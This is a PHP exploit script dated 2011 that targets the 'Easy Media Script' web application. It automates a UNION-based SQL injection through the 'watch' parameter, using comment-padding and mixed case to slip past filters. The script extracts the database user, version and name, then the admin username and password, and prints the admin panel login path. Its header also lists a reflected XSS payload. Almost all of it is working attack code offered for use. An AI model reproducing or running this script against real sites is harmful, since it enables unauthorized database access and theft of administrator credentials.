<?php if(!$argv[1]) die(" Usage : php exploit.php [site] Example : php exploit.php http://site.tld/[PATH]/ "); print_r(" # Tilte......: [ Easy Media Script SQL Injection ] # Author.....: [ Lagripe-Dz ] # Date.......: [ 27-o5-2o11 ] # Location ..: [ ALGERIA ] # HoMe ......: [ Sec4Ever.com & Lagripe-Dz.org ] # Download ..: [ http://easymediascript.com/ ] # Gr33tz ....: [ All Sec4ever Member'z ] -==[ ExPloiT ]==- # SQL Inj : http://site/ems/?watch=1' # XSS : http://site/ems/?go=\">< ScRiPt>alert(0)</ScRiPt> -==[ Start ]==- "); $t=array("db_user "=>"user()","db_version"=>"version()","db_name "=>"database()", "UserName"=>"user","Password"=>"pass"); foreach($t as $r=>$y){ $x=@file_get_contents($argv[1]."?watch=-1'/**//**//*!uNiOn*//**//**//*!sElEcT*//**//**/1,group_concat(0x".bin2hex("<$r>").",$y,0x".bin2hex("<$r>")."),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25/**//**/fRoM/**//**/ip_admin%23"); preg_match_all("{<$r>(.*?)<$r>}i",$x, $dz); echo $u = ($dz[1][0]) ? "[-] $r: ".$dz[1][0]."\n" : "[-] $r: Failed !\n"; } echo "[-] AdminPanel: ".$argv[1]."ip-admin/login.php\n"; print_r(" -==[ Finished ]==- "); # END .. ! ?>
体验盒子
